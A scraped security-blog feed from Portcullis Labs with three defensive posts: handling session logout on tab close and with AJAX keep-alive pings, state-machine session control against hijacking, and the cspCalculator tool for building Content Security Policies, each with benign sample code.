JavaScript provides an event which is fired at the moment a browser window or a browser tab is closed. The name of this event is onbeforeunload. In fact, this event is fired before a page is unloaded, which includes: closing the tab, reloading the page, using the browser’s navigation buttons, clicking on a link…

How the web browser acts when this event is fired is implementation-dependent. In general, this event can be used to display a message box asking users whether they want to close the current page. This message box contains two buttons to allow the user to choose between completing the action (closing the tab) and staying on the page.

So, in principle, it could be possible to detect when the user is closing the page and then send a request to the server with their confirmation. The trouble is that the majority of web browsers do not return control to the JavaScript interpreter before closing the tab, so it is not possible to send the request only in those cases where the user decides that they actually want to close the tab (the event handler can always send a request before asking the user, but only a few browsers will be able to do so after confirmation).

Testing showed that Firefox returns control to the JavaScript interpreter but, depending on the version, this only works when the page is reloaded, not when a tab or the browser is closed (tested with versions 23 and 24). In the same way, Opera version 17 will send the logout request when the browser is closed, but not if the user closes the tab. The rest of the tested browsers (Safari, IE and Chrome) did not send anything if the user confirmed the tab/browser closing.

The following code is an example of how to implement it:

<html>
<head>
<script src="http://code.jquery.com/jquery-1.10.2.min.js"></script>
<script>
// Not using jQuery
/*
window.onbeforeunload = function () {
    return "Are you sure you want to LOGOUT the session?";
};

// Used to log out the session when the browser window is closed
window.onunload = function () {
    $.get( "http://127.0.0.1/logout" );
};
*/

// Using jQuery
$(window).on('beforeunload', function() {
        return 'Are you sure you want to LOGOUT the session?';
});

$(window).unload(function() {
        $.get( "http://127.0.0.1/logout" );
});
</script>
</head>
<body>
  <h1><i>Unload</i> and <i>Beforeunload</i> example</h1>
  Please, reload, close this tab or close the browser to launch the test.
</body>
</html>

So, as you will have noted, this is not a suitable solution to the original problem outlined at the start of this post.

Using AJAX ping

A better approach, because it should work in any web browser, is to reduce the session timeout configuration on the server to a few minutes (2-5 minutes) and to ping the server regularly (every 15-30 seconds) with an AJAX request. The ping request will maintain the session’s life on the web server, preventing it from being timed out unintentionally. On the other hand, if the user closes the tab or the browser, the session will be terminated by the web server after the configured period.

The code below is a possible implementation of an AJAX ping using jQuery:

$(function() { window.setInterval(function() { $.post('http://example.com/keepAlive'); }, 15000); });

This line should be included in every web page of the application, so it would be a good idea to place it in a file and include that file in the contents of every page served by the web server.

With this solution, there are two problems:

  • The server will need to be able to support the load of the ping requests which, depending on the number of users, could be thousands each minute. But an application which had that number of users should be able to support that load, so this is not a real problem.
  • If the user leaves the application opened in a browser without supervision, the session will never time out.

The way to fix the second problem is to count the number of pings the server has received without any other kind of request and to configure the application to close the session after the corresponding time (idle time). The idle time limit will need to be longer than the session timeout that has been configured, to allow for users who are using the application but staying on the same page for a while. For example:

Imagine that the session timeout was configured to 2 minutes and the delay between pings to 15 seconds. That means that after closing the browser, the session will remain live for 2 minutes maximum before being closed. That is a suitable period of time for the web server to wait before timing the session out because it will tolerate some network or connectivity problems which could in principle cause some of the pings to be lost (8 ping requests would have to be lost to close the session by mistake).

The major problem is the idle time, which will have to be configured depending on the kind of application. If the web application contains long articles, the idle time should be set to a longer period (5-10 minutes). If the application consists of small pages, then the idle time could be configured to the same as the session timeout (but never shorter).

By doing this, the application will cover:

  • If the tab or web browser is closed, the session will be terminated after session time out (2 minutes in the example).
  • If the user leaves the application unattended, the session will be closed after the idle time (at least as long as the session timeout but no more than 10 minutes).
  • While the user is working with the application, the session will remain active.
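The bookkeeping behind these rules can be sketched as follows. This is a hypothetical server-side illustration, not code from any particular framework; the names, limits and in-memory storage are made up for the example, with the limits matching the figures used earlier (2 minute session timeout, 5 minute idle limit):

```javascript
const SESSION_TIMEOUT = 2 * 60 * 1000; // ms without any ping: tab/browser was closed
const IDLE_LIMIT = 5 * 60 * 1000;      // ms without a real request: user walked away

function createSession(now) {
  return { lastPing: now, lastRealRequest: now };
}

// Called for every genuine application request.
function touch(session, now) {
  session.lastPing = now;
  session.lastRealRequest = now;
}

// Called for the AJAX keep-alive ping only.
function ping(session, now) {
  session.lastPing = now;
}

function isExpired(session, now) {
  // Pings stopped arriving: the tab or browser was closed.
  if (now - session.lastPing > SESSION_TIMEOUT) return true;
  // Pings keep arriving but nothing else does: the session is idle.
  if (now - session.lastRealRequest > IDLE_LIMIT) return true;
  return false;
}
```

Each incoming request would call touch(), each keep-alive would call ping(), and a periodic sweep (or the next request) would call isExpired() to decide whether to terminate the session.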

A final improvement would be to use a variable timeout. It could be configured to the same period as the session timeout in most cases but could also be increased for those pages which will take longer to read.

Editor’s note: If you enjoyed our two articles on how to improve session management, we’ve asked the author to put together a good practice guide detailing these and other practical steps that can be employed to help keep your users safe.

The post Improving the security in web sessions (part 2) appeared first on Portcullis Labs.

]]>
https://labs.portcullis.co.uk/blog/improving-the-security-in-web-sessions-part-2/feed/ 0
Improving the security in web sessions (part 1) https://labs.portcullis.co.uk/blog/improving-the-security-in-web-sessions/ https://labs.portcullis.co.uk/blog/improving-the-security-in-web-sessions/#comments Thu, 09 Jan 2014 14:14:18 +0000 https://labs.portcullis.co.uk/?p=2012 Session management is a crucial part of web applications and therefore it is also the target of numerous kinds of attacks. Critical web applications, such as banking applications, require complete control of the users’ sessions to prevent abuses or session hijacking attacks. One way to complicate these types of attack, is for the web application […]

The post Improving the security in web sessions (part 1) appeared first on Portcullis Labs.

]]>
Session management is a crucial part of web applications and therefore it is also the target of numerous kinds of attacks. Critical web applications, such as banking applications, require complete control of the users’ sessions to prevent abuses or session hijacking attacks.

One way to complicate these types of attack is for the web application to have complete control of the user session. Typically web applications use a session token, normally in the form of a cookie, to identify sessions, but they do not normally check anything else to verify the legitimacy of the session. So if an attacker can retrieve the token used by an authenticated user in some manner, the attacker can usually steal the victim’s session by sending the retrieved token within each request.

However, if the web application tightly controls the state of the user inside the application, it would be very difficult for an attacker to steal their session while the user is still interacting with it. Let me explain with an example:

Imagine an application whose flow can be represented with the following diagram:

FlowDiagram
image-2013

In the initial state, users would not be logged into the application and, until they do so, they will stay in that state. After logging in to the application, they get access to the private area of the application where there are 3 different pages. From any of those pages, the user can finish their session by going to the logout page. Inside the private area, users can only browse the pages in the order: 1 -> 2 -> 3 -> 1 -> 2 … Any other interaction which is not represented by an arrow in the diagram would not be allowed (for example, going from 2 to 1).

In this context, each session could be represented by the usual session token plus the state which the user is in. With this in place, if an attacker was able to retrieve the token in order to attempt to gain access to the application, they would try to access a random state which potentially wouldn’t correspond with any of the valid next states.

For example, if the legitimate user is in the state “Private Page 1″ at the moment of the attack, the only 2 possible next states are “Private Page 2″ and “Log out”. An attacker would need to know this and, if they did not, the application could detect the attack and invalidate the session. It is true that this can be discovered by exploiting other vulnerabilities, such as a Cross-site Scripting flaw in the application, but if so, the application will record that the new user state is, for example, “Private Page 2″. Therefore, when the legitimate user tries to get access to the next state (remember that they were actually in the “Private Page 1″ state), the application will detect the irregularity and will terminate the session.

Hence, although the attacker would be able to retrieve the token and to perform several requests by discovering the state of the user, the application will identify the problem if the user continues using the application and the states of the user and the attacker become desynchronised.

In this scenario, an attacker who successfully locates another suitable vulnerability in the web application (the XSS discussed above) might be able to identify the state of the user, allowing them to retrieve the token and the state and to refresh the web browser of the user by changing the session token. By doing so, the attacker would be able to use the session, but the user will detect that something weird happened as their session will likely be terminated.

To avoid this situation, the application should protect against the use of concurrent logins. So when the legitimate user logs in again, the application will detect the second session of the same user and will terminate both sessions.

A limitation of this solution is that legitimate users cannot have more than one tab in the same browser on the same application because each tab would be in different states causing the application to identify the scenario as a possible attack and terminate an otherwise legitimate session. Browsers’ navigation buttons (back and forward) would provoke the same eventualities because the user could change between states in the client side “bypassing” the control of the web application.

In order to implement this, the server side application would need to be designed like a state machine where all the relationships between the states are defined. The application will need, therefore, to store the current state of the user inside his session and to check that every request came from the current state and that it is addressed to any of the states which are accessible from the current.
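As a minimal sketch of such a state machine, using the page flow from the diagram above (the names and the per-request check are hypothetical illustrations, not taken from any real framework):

```javascript
// Allowed transitions for the example flow: 1 -> 2 -> 3 -> 1, with logout
// reachable from any private page.
const transitions = {
  'login': ['page1'],
  'page1': ['page2', 'logout'],
  'page2': ['page3', 'logout'],
  'page3': ['page1', 'logout'],
};

// Checks a request against the session's current state. Returns the new state
// on a valid transition, or null, signalling that the session must be terminated.
function nextState(session, requestedPage) {
  const allowed = transitions[session.state] || [];
  if (!allowed.includes(requestedPage)) {
    return null; // invalid transition: treat as a possible hijack attempt
  }
  session.state = requestedPage;
  return requestedPage;
}
```

The server would run this check on every request before dispatching to the page handler, storing the state inside the server-side session.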

The tokens used to mitigate Cross-site Request Forgery (CSRF) attacks could be used to check the state the user is coming from. If the token received by the application with each request matches the token sent to the user previously, this means that the user is coming from a valid state. One of the problems with this approach is that all requests will need to include the CSRF token (including GET requests) and most libraries do not allow this check for GET requests. Another problem with the usage of the CSRF token is that the solution implemented by many frameworks uses one unique token which is sent throughout the application but which does not change between requests. In this instance, it would not be possible to differentiate between two different states.

A different approach could be to check the HTTP header “Referer” from each request. In this case, the state could be represented by the URL from where the user is navigating from (remember that this header cannot be trivially manipulated by using JavaScript – only the web browser has access to it). Alternatively, instead of the “Referer” header, an extra hidden field could be added in each form and link which saves the state and preserves it between requests.

Each approach has its benefits and its problems so probably a mixed solution would be better, using the CSRF to preserve the valid states between requests and checking the “Referer” HTTP header to check previous states.

So, summarising:

  • Web session security can be improved by understanding web applications like a state machine and checking the state of each user in each request.
  • Advantages: this approach prevents and/or complicates attacks on the session, such as session hijacking. Furthermore, it might complicate the usage of guessable/default accounts if another user is using them, because concurrent sessions must be avoided.
  • Disadvantages: users cannot use the application in different tabs and the interaction with it is limited to the actions offered on each page, ruling out the usage of the web browser’s navigation buttons.
  • Two possible implementations consist of checking the “Referer” HTTP header and/or the CSRF token sent within each request.

In the next post, I will address another problem relating to web session management: how to identify when a user is no longer using the application, and how to close the session as soon as possible.

The post Improving the security in web sessions (part 1) appeared first on Portcullis Labs.

]]>
https://labs.portcullis.co.uk/blog/improving-the-security-in-web-sessions/feed/ 0
cspCalculator https://labs.portcullis.co.uk/tools/cspcalculator/ https://labs.portcullis.co.uk/tools/cspcalculator/#comments Wed, 08 Jan 2014 15:35:09 +0000 https://labs.portcullis.co.uk/?p=1110 cspCalculator is a PoC implementation of a dynamic Content Security Policy creator. Key features Allows on the fly manipulation of Content Security Policy Enables UX developers to get visual feedback on how a CSP affects the application functionality Minimises the changes required to an existing application to allow this to happen Overview Content Security Policies […]

The post cspCalculator appeared first on Portcullis Labs.

]]>
cspCalculator is a PoC implementation of a dynamic Content Security Policy creator.

Key features

  • Allows on the fly manipulation of Content Security Policy
  • Enables UX developers to get visual feedback on how a CSP affects the application functionality
  • Minimises the changes required to an existing application to allow this to happen

Overview

Content Security Policies are a new feature of modern browsers that support HTML 5, designed to augment the traditional Same Origin Policy of browsers and help to limit the potential impact of Cross-site Scripting and other content manipulation vulnerabilities that may exist within a given web site and which could be exploited by an attacker. They allow web site owners to declare approved sources of content that browsers should be allowed to load on a page, out-of-band, through the use of additional HTTP headers.

The aim here is to minimise the leg work for UX developers in creating web applications that both function and utilise secure development practices. We do this by reducing the server side code changes down to the injection of some client side JavaScript along with a few lines of server side stub code (in this case, in PHP). Once this has been integrated into an application in a staging environment, the UX developer can tweak the CSP from their own browser and see how it affects the application functionality :).

Installation

  • Copy styles and js from src/html to your web root
  • Copy index.php from src/html/examples/php to your web root or tweak your existing web pages in a similar fashion

Usage

The client side code (HTML) should include the following changes:

<head>
...
	<link rel="stylesheet" href="styles/cspCalculator.css" type="text/css"/>
...
</head>
<body>
	<script src="js/cspCalculator.js"></script>
	...
</body>

This will result in the CSS and JavaScript used to construct the cspCalculator UI being injected into resultant pages.

Additionally, as a minimum case, the server side code should implement the following logic:

$directiveslist = array("default-src", "connect-src", "font-src", "frame-src", "img-src", "media-src", "object-src", "script-src", "style-src", "sandbox");
$headerslist = array("Content-Security-Policy", "X-Content-Security-Policy", "X-WebKit-CSP");
foreach ($directiveslist as $directivename) {
	if (isset($_COOKIE[$directivename])) {
		header("Set-Cookie: " . $directivename . "=" . $_COOKIE[$directivename], false);
	}
}
foreach ($headerslist as $headername) {
	$headerparts = array();
	foreach ($directiveslist as $directivename) {
		if (isset($_COOKIE[$directivename])) {
			$headerparts[] = $directivename . " " . $_COOKIE[$directivename];
		}
	}
	header($headername . ": " . implode("; ", $headerparts));
}

We use cookies as a back channel to allow changes to the Content Security Policy by the UX developer from the UI to easily be signaled back to the web application so that the appropriate headers can be set. Cookies work nicely for this purpose as they do not interfere with any GET or POST parameters that the application may need to send for normal operation.
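For illustration, the two halves of that back channel — writing one cookie per directive and joining the directives back into a single header value — can be sketched as plain functions. The names here are hypothetical and are not cspCalculator's actual API; the real server-side half is the PHP stub shown above:

```javascript
// Builds the "name=value; name=value" cookie string the UI would set, one
// cookie per CSP directive, matching what the PHP stub reads from $_COOKIE.
function buildCookieHeader(directives) {
  return Object.entries(directives)
    .map(([name, value]) => name + '=' + encodeURIComponent(value))
    .join('; ');
}

// Joins "directive value" pairs with "; " into a single CSP header value,
// e.g. "default-src 'self'; script-src 'self' https://code.jquery.com".
function buildCspHeaderValue(directives) {
  return Object.entries(directives)
    .map(([name, value]) => name + ' ' + value)
    .join('; ');
}
```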

Once operational, your web application will now include a drop down cspCalculator box on each of its pages. Within the drop down you will see various text boxes for each of the CSP directives that can be defined. The “Calculate” button next to each will attempt to determine the appropriate policy by examining the page’s DOM (something that isn’t 100% effective yet). The “Apply” button will force a round-trip to the server to force it to send the page with the new CSP headers applied. It is recommended that you use this tool in combination with something such as Chrome’s Inspect Element feature to identify any DOM elements that are blocked and which cspCalculator is unable to identify automatically.

cspCalculator should not be deployed in a production environment, since the setting of cookies and/or a CSP by use of header() calls may itself introduce other classes of vulnerability. Rather, once the appropriate CSP has been identified it should be set statically through the use of header() (as in PHP) or other similar calls.

Examples

Since cspCalculator isn’t particularly easy to demonstrate in a static context, a demo version has been deployed for your amusement. This can be found at www.cspcalculator.org. It has been presented on a separate domain to minimise the risks outlined above in the Usage section of this page.

CspCalculator-0.2 Tar
cspCalculator-0.2.tar.gz
November 29, 2013
14.2 KiB
MD5 hash: 496b55e3ffa575178428d1d85e42e113
Details

The post cspCalculator appeared first on Portcullis Labs.

]]>
https://labs.portcullis.co.uk/tools/cspcalculator/feed/ 0